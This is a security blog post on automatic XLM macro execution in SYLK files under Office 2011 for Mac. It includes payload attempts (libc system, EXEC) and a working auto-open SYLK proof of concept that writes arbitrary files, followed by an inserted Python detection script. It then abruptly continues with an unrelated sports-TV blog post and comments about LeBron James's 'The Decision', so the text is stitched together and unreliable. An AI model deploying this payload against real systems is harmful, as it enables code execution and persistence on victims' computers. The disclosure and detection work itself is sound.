Flipboard: Sylk Xlm Code Execution On Office 2011 For Mac
October 12, 2018

At our Derbycon talk, Stan and I presented various novel techniques for abusing Excel and Word in Red Teaming operations. One of the tricks introduced was about the Sylk file format.

Full detailed blogs on Sylk and other discussed subjects will follow later. For now it suffices to say that we shared an example Sylk file that pops Calc using XLM when the victim enables macros. As Sylk files are text files, they do not open in protected mode.

TL;DR

In Office 2011 for Mac, XLM macros in Sylk files are auto-executed (no protected mode or macro prompt). Time to say goodbye and really remove Office 2011. The issue may even be triggered if you have both Office 2016 and 2011 for Mac installed.

Background

After our talk, I directly took a plane back home. When I arrived back in Amsterdam I took a train home. During my train ride, I decided to play around further and weaponize Sylk using DCOM for lateral movement.

I was tired from the flight, and somewhere in that process I managed to open the example Sylk file in Office on macOS instead of Windows. I got the following warning:

Hey, that's strange. I had not yet enabled macros, but already some part of the macro got interpreted? Looking into it further, I noticed that the Sylk file was opened with Excel 2011, instead of Excel 2016, which I also had installed. This needed some closer inspection. But my train had almost arrived; I barely had time to update the EEXEC from the demo sample to EALERT and without any macro warnings got the following alert:

So, Sylk XLM bypassed all macro security alerts in Office 2011 on Mac! Furthermore, on my Mac SLK is by default bound to Office 2011 instead of Office 2016.
The train arrived, I went home and started working on weaponization.

Weaponization

Based on the XLM documentation, Stan and I started working on weaponization. Unfortunately, simple examples that worked for Office for Mac 2016 did not work on Office 2011. We tried various failing approaches:

C;X1;Y101;K0;ECALL('libc.dylib','system','JC','open -a Calculator')

The EXEC command somehow provided different error messages when I provided an .exe extension, so I tried with a bash script test.sh as well as test.exe.

C;X1;Y101;K0;EEXEC('test.sh')

As various code execution approaches failed, and I was jet-lagged, I decided to sleep on it.

The next day I decided to go in another direction: show that I was capable of writing a file with arbitrary contents to an arbitrary location, and use this to write to a persistence location.
For that I needed to study the XLM and Sylk spec a bit deeper and ended up with the following 400 bytes.

ID;P
O;E
NN;NAutoopen;ER1C1;KOutFlank;F
C;Y1;X1;N;EDIRECTORY
C;X1;Y2;K0;ESELECT(R1C1)
C;X1;Y2;N;K13;EFIND(':';;R1C1)
C;X1;Y3;N;K19;EFIND(':';;R1C1;;R2C1+1)
C;X1;Y4;N;K27;EFIND(':';;R1C1;;R3C1+1)
C;X1;Y5;N;ELEFT(R1C1;;R4C1 -1)
C;X1;Y6;N;KFALSE;EDIRECTORY(R-1C)
C;X1;Y7;N;K0;EFOPEN('MALICIOUS.FILE';;3)
C;X1;Y9;K0;EFWRITE(R7C1;;'PWNED BY OUTFLANK')
C;X1;Y10;K0;EFCLOSE(R7C1)
C;X1;Y11;K0;EHALT
E

Line 1 is just a standard header. Line 2 indicates a Global Option: this sheet is a Macro (Executable) sheet. Line 3 indicates the name of the macro; when it is named Autoopen, it starts on open. Then we move into the real XLM macro.

The DIRECTORY command provides us with the current dir separated with colons (:). We parse the first 3 colons from the string and then use the DIRECTORY command again to go into that dir (typically /macintoshHD/users/$username). Then we open a file 'MALICIOUS.FILE' and write our output there. The E record indicates the end of the file. I guess anybody can adapt this to a user-space persistence method. Time to report to Microsoft.

Reporting to Microsoft

9-10-2018: Issue reported
Reaction Microsoft: The product team has taken a look at this submission and has informed me that Excel for Mac 2011 is not supported any more, and thus is not eligible for security updates.
Mac Excel 2016 and 2019 prompt with “Enable Macro” alerts correctly.

For further discussions, questions and more, you can reach us on Twitter. We’ll have a blog live soon on the exact Sylk spec, our various attack examples, etc. Instead of finishing our blogs we decided pwning Office 2011 on macOS was way cooler 😉

Update

Just noticed that a rename to CSV also works. A CSV that can execute code and write to arbitrary disk locations. Who could’ve imagined that.
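A defender-side check for the behaviour described in this post, as an added example that is not code from the original post: it inspects file content rather than the extension (the update notes that a rename to CSV also works) and flags the O;E macro-sheet option, an auto-open name and the XLM calls seen in the samples above. The function names, the allow/review/block policy and the sample bytes are assumptions constructed for illustration.

```python
import re

# XLM functions the post's samples use for execution and file writes.
RISKY_FUNCS = {"EXEC", "CALL", "FOPEN", "FWRITE"}
AUTO_NAME = re.compile(r"auto_?open", re.I)  # the post's sample uses "Autoopen"

def split_fields(record):
    """Split a SYLK record on ';'. A doubled ';;' is kept as a literal ';'
    (assumption, based on how the post's sample separates arguments)."""
    fields, cur, i = [], "", 0
    while i < len(record):
        if record[i] == ";" and record[i + 1:i + 2] == ";":
            cur, i = cur + ";", i + 2
        elif record[i] == ";":
            fields.append(cur)
            cur, i = "", i + 1
        else:
            cur, i = cur + record[i], i + 1
    return fields + [cur]

def scan_sylk(data):
    """Inspect raw file bytes; the file name is deliberately not consulted."""
    lines = [l.strip() for l in data.decode("latin-1").splitlines() if l.strip()]
    report = {"is_sylk": False, "macro_sheet": False, "auto_names": [], "risky_calls": []}
    if not lines or not lines[0].startswith("ID;"):
        return report                      # no SYLK ID header record
    report["is_sylk"] = True
    for line in lines[1:]:
        rtype, *rest = split_fields(line)
        if rtype == "O" and "E" in rest:   # O;E: sheet is a macro sheet
            report["macro_sheet"] = True
        elif rtype == "NN":                # name record, N field holds the name
            report["auto_names"] += [f[1:] for f in rest
                                     if f[:1] == "N" and AUTO_NAME.fullmatch(f[1:])]
        elif rtype == "C":                 # cell record, E field holds an expression
            for f in rest:
                if f[:1] == "E":
                    calls = re.findall(r"([A-Za-z.]+)\(", f[1:])
                    report["risky_calls"] += [c.upper() for c in calls
                                              if c.upper() in RISKY_FUNCS]
    return report

def verdict(filename, data):
    """Hypothetical triage policy for a mail or download gateway."""
    r = scan_sylk(data)
    if not r["is_sylk"]:
        return "not-sylk"
    if r["auto_names"] or r["risky_calls"]:
        return "block"
    if r["macro_sheet"] or not filename.lower().endswith(".slk"):
        return "review"                    # e.g. SYLK content named .csv
    return "allow"

# Constructed samples for the example, not captured files.
FLAGGED = (b"ID;P\r\nO;E\r\nNN;NAutoopen;ER1C1\r\n"
           b"C;X1;Y1;K0;EFOPEN('EXAMPLE.TXT';;3)\r\n"
           b"C;X1;Y2;K0;EFWRITE(R1C1;;'x')\r\nC;X1;Y3;K0;EHALT\r\nE\r\n")
PLAIN = b"ID;P\r\nC;X1;Y1;K42\r\nE\r\n"
CSV = b"name,amount\r\nalice,10\r\n"
```

Calling verdict("q3.csv", FLAGGED) returns "block", while the same macro-free SYLK bytes are allowed as .slk and sent for review when named .csv.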
I went to sleep last night not sure if I should write anything about “The Decision,” the bizarre, excruciating one-hour special that ESPN carried last night so LeBron James could announce that he was leaving the Cleveland Cavaliers to sign with the Miami Heat. This isn’t a sports blog (though I did, on rare occasions, write about the Yankees and Giants at ) and actual sportswriters like and have already offered up more thoughtful takes than anything I’ve got. Plus, as a Knicks fan, I worried that I’d just come across as someone bitter about being jilted. But this is a TV story, in the end, as LeBron was involved in one of the lamest, most obnoxious hours I’ve ever had to witness (and remember, I watch “American Idol” weekly). And while I’m disappointed (and have already moved on to hoping the David Lee/Anthony Randolph trade turns out to be the opposite of all the moves Isiah Thomas made during his nightmarish tenure), I had reached a place by Wednesday afternoon (i.e., before the Miami reports came in and it looked like LeBron was either staying home or coming to New York) where I began to wonder if I wanted this guy on my team.
Okay, let’s be real: I really, really wanted him. He’s the most talented player on the planet, the entire Knicks roster was constructed as a bunch of complementary pieces to the King (and desperately needs a point guard without him), etc., etc., etc.
But he had come across so badly in the way he handled free agency – not helped by a sports news media(.) that treated every rumor as gospel, setting the concept of the reliable source back several decades and making LeBron look even more indecisive than he was – that I would have felt like my team and its fans were making a deal with the devil by this point. I’d have taken him, obviously, but not with nearly the enthusiasm as I would have before this process began. (.) One of the few exceptions to this was Alan Hahn, the outstanding Knicks beat writer for New York Newsday, who stayed out of the fray and didn’t report every stray piece of gossip he had heard as if it was wisdom from the mountaintop. So when that LeBron had chosen Miami, I felt confident it was true. The work of Hahn and a handful of other reporters (like Brian Windhorst from the Cleveland Plain Dealer, who knew LeBron since high school and put out earlier in the week) on this story was in stark contrast to the likes of ESPN’s Chris Broussard, who changed LeBron’s destination every five seconds, and who, after also ultimately staking his claim to Miami as the pick, looked miserable and terrified at the start of “The Decision,” knowing that if LeBron’s people had been playing him, he’d look like even more of a clown than he had over the previous week.
Just a bad period all around for the media. For a guy who’s obsessed with his “brand,” it’s staggering how badly he bungled things from a PR standpoint.
Going to Miami for a team that would feature two of the NBA’s top 3 players, plus a guy easily in the top 15, makes an incredible amount of sense. Yes, there’s risk that his game might not mesh with Dwyane Wade and Chris Bosh, and that Pat Riley might not be able to surround them with enough quality role players, but from a basketball standpoint, it’s still a better situation than Cleveland (capped-out and filled with mediocre guys made to look better by James), Chicago (lots of talent, but no shooters that he needs, plus he and Derrick Rose seem incompatible), New York (lots of shooters plus Amar’e, but little depth and defense if he signed), etc. It makes sense from a basketball standpoint, and from a narrative standpoint.
LeBron played with Wade and Bosh at the Olympics. They hit it off famously, allegedly discussed joining together when all were free agents, etc.
If LeBron wanted the story to be “Miami gives me by far the best chance to win, and as a bonus I get to play with my friends, and I will take less money for those things than I would have in Cleveland or elsewhere” he needed to make the announcement at the same time as Wade and Bosh, and he needed to do it in a much lower-key way, like a simple press conference. That way he looks decisive (as opposed to waiting for them to make their choice), doesn’t look like an attention hog, doesn’t create the largest possible audience in which he could tell New York, Chicago, New Jersey and, especially, Cleveland, to drop dead. If he wanted to raise money or awareness for Boys and Girls Clubs, he could have easily done that in a lot of other ways, including announcing at said press conference that he was going to write them a large check from his new Miami contract. Not only did the timing and the idea of doing a solo primetime show come off badly, but the execution by both LeBron and ESPN was horrid.
I understand why ESPN would agree to this – ratings were huge – but both the athlete and the channel came out looking terrible. I wrote a joking on Wednesday about the idea that LeBron and ESPN might need to copy some reality show results show tropes to fill the time, and most of those suggestions would have been denser and more entertaining than what ESPN and LeBron ultimately chose to do. One of the most tone-deaf interviewers in the history of televised sports? A man who never seems to make a human connection with either his subject or audience? This is who you want asking the first questions about LeBron leaving his home state heartbroken so he can go play for an all-star team? And LeBron comes into this without any kind of clear talking points about the appeal of Miami (besides the chance to win) or his regrets about leaving Cleveland?
Did no one prepare him in any way? Did he have no idea how stiff and robotic and cruel he came across as throughout that special? Look, LeBron was always going to be criticized in some corners for this move by people who suggested (as Knicks Hall of Fame guard Walt Frazier did) he was taking the easy way out by linking up with Wade, who had already won a title. And Cleveland was always going to be miserable no matter how LeBron pulled this off. The team will slide back into mediocrity, if not ’00s Knicks-level badness, and the area will lose a lot of money that came from 41 sold-out games a season.
But the way it actually went down, it’s not hard to understand why Cavs fans were burning his jersey in the street, or why Cavs owner Dan Gilbert went to Defcon-1 and issued an amazing, juvenile, incendiary to the team’s fans that, among other things, promised, in all-caps (and Comic Sans!): “I PERSONALLY GUARANTEE THAT THE CLEVELAND CAVALIERS WIN AN NBA CHAMPIONSHIP BEFORE THE SELF-TITLED FORMER ‘KING’ WINS ONE.” It’s not hard to understand how LeBron went from one of the most-liked players in the league to someone whose polling turned unfavorable seemingly overnight. As a TV show, “The Decision” was both nasty and boring (a tough combination to pull off). As an attempt to build the brand of LeBron James, it was a catastrophe. The pressure on this trio to win multiple championships will be huge and unforgiving: if they win, it’s because they were expected to, and if they lose, it’s embarrassing. And the biggest target will be on the back of the man who sat stone-faced in Greenwich, CT last night.
Alan Sepinwall may be reached at. According to Gray himself, who appeared on the Dan Patrick radio show yesterday, it was his idea from the start. He claimed to have approached Maverick Carter, LeBron’s “manager,” at the NBA Finals in LA and proposed packaging an interview together and selling it to ESPN.
He also said Ari Emmanuel was there (of course) and thought it was a great idea. Gray’s freelance, though after that sham last night, he should never be permitted to refer to himself as a “journalist” again. To me, the interesting thing was what terrible TV it was. I wasn’t surprised how poorly LeBron handled it all, or how tone deaf it was to Cleveland fans (a group to which I belong, and as such have been conditioned to expect such treatment).
But the 15 minute lead-in, the fake jerseys, the Stu Scott bloviating, Chris Broussard sweating like a fool, etc. Then the interview started and for 6 MINUTES Gray wasted more time, even asking one question twice! I feel like I could talk about all of this for hours, but at the same time it left me so sick that I never want to think of it again.
The world we live in is what created this whole mess, in my opinion. Celebrity obsession, 24/7 news days, and social networking all contributed to this mess, LeBron gets some blame, but I don’t hate the guy over this. He’s a product of his generation and the environment that generation grew up in. I don’t care for how he handled this, but I don’t hold it against him, and it doesn’t make me think any less of him as a person. My only question is, where was the person to tell him “don’t do the TV special”. People forget that he is still only 25 years old.
Hell, I’m 24 and I can’t imagine making a choice like that. I thought it was weird how Lebron talked about his “team” sitting down across from the other “team” to see if he wanted to be a part of their “team.” Showed where his head was really at. Also, not that championships won at Miami will be tarnished in any way, but say he wins 3 or 4 or 8.
You won’t say “Lebron won 8 championships in Miami,” the way you say “Jordan won 6 in Chicago.” I guess he doesn’t care about them being HIS. He is no longer the King. Maybe the Grand Vizier? Shoulda come to NY. Double yes (coming from a Mets fan).
And, as a Bulls fan, I’m now kind of glad James didn’t come to Chicago. Better that he remains a rival than booed for the home team.
I didn’t watch the show (seeing as what news was coming out of the special would be reported everywhere), and you’ve done a great job of painting a picture of something I’m glad I missed. In fact, I was watching season 3 of The Wire to follow along with the summer columns here while the show was progressing, and I feel confident that I made the right choice. Still, great article, Alan! To me there are 2 separate and distinct parts to this whole situation. First, the show itself which was indeed a bad idea all the way around (compounded by ESPNs horrible execution of said idea).
While LBJ is ultimately responsible for going through with the show I think his management and PR folks have a lot of culpability here. He’s still a young guy and if his people said it would be good for him to do it, how would he know any better? He’s an athlete not a scholar. The second issue that everyone really seems to be up in arms over is this supposed “betrayal” of Cleveland. I don’t get that part AT ALL. He’s an athlete who gave his all to the team for seven years. He didn’t and doesn’t owe Cleveland a damn thing.
Cavs management had seven years to give him enough quality teammates/coaches to win a championship and failed utterly at every opportunity. If I was a Cavs fan I’d be more upset at ownership for mismanaging the cap and mismanaging their talent acquisition so badly that Lebron felt his best opportunity to win was to leave. Yo, the betrayal thing goes like this. We all knew he could and likely would leave. We never, ever, ever, ever, etc. thought he would do it on national tv without so much as a personal phone call to say goodbye to the team that gave him his start in the NBA.
We were betrayed because it was disrespectful. It was unclassy, rude and pretentious, something many of us in the area have been convincing ourselves LeBron was not. We were wrong.
Go ahead and leave our team-you were still born and raised here and did give us 7 great years of wonderful basketball. But don’t treat your first team the way you just did-your hometown just may not forgive you for spitting in its face on your way to bigger and better things. He does owe them common decency, for all the support and for helping to pay millions of dollars a year for him to play basketball. He also owes the common decency of telling his teammates and coworkers and Cleveland fans that he is leaving, and why. He didn’t do that, and the reason he didn’t do that was to make that stupid reality tv abortion on ESPN have more drama.
Let that sink in. The fans who loved him for years, attended his games, and his teammates who worked with him every day for years – he didn’t respect these people enough to tell them any sooner than he told the rest of the world on live TV special, and he didn’t tell them to increase dramatic effect. That is awful. Add to that there was no real dramatic effect, 48 states in the country predicted he was gone to Miami, if that even makes a difference. Cavs management didn’t give him quality teammates?
They led the league in wins the past two years! Who failed this past May? Pretty sure you should rewatch games 4, 5 and 6 of the Boston series. No one failed worse than Lebron.
1.) Everyone recognizes that he was a free agent and therefore completely within his rights to sign with anyone he wanted. However, he was supposed to be a guy who understood the plight of the Cleveland sports fan and how much The Drive, the Fumble, the Shot, and Jose Mesa destroyed that city.
At the very least, if he left, he owed them a little common decency, i.e., not dragging them out into public and humiliating them on national television. 2.) As for having a better chance to win titles in Miami: a. Why exactly does he have a better chance to win now than with the Cavs, who have had the best record in the NBA each of the past two seasons and were picked by most pundits to win the title this year; b.
If winning is so important that he (and Wade and Bosh) is willing to take less money to join forces, then why didn’t he ever take less money in Cleveland so that they could lure any marquee free agents the past seven years?; and c. Cavs management gave LeBron whatever he wanted, as alluded to in Dan Gilbert’s (admittedly insane and counter-productive) letter. He couldn’t get the job done, and now the “King” wants to be Robin to Wade’s Batman. Have fun becoming a “global icon” now. Alan, I’m a big fan. I just finished re-watching season 3 of the Wire and have been reading your season 3 recaps. I’m also a huge sports fan and have been following the LeBron decision.
In your last Wire review, you wrote how Marlo is strictly a product of “the game” and how this has made him much more one-dimensional in his focus compared to Avon and Stringer. He doesn’t care about/understand the outside world. I think there is a comparison to be made with LeBron. He’s grown up post Jordan, post ESPN and ESPN2. His whole career has been during the internet era. All he’s known is athletes being beloved, not because of what team they play for, but because of the brand name they have created for themselves. I don’t think he could conceive people not loving him no matter what decision he made because he sees himself as a Jordan-like icon that is supposed to be loved.
Much the same way Marlo couldn’t imagine anything more important than power and street cred because that’s all he knows to strive for. I went to sleep last night not sure if I should write anything about “The Decision,” the bizarre, excruciating one-hour special that ESPN carried last night so LeBron James could announce that he was leaving the Cleveland Cavaliers to sign with the Miami Heat.
Dude – you should have stayed asleep. If the negative opinions of James and his EGO were currency – we could pay off the National Debt. He wanted his own reality show and he got it and now he will pay for it but not with my money. NBA – I am OUT!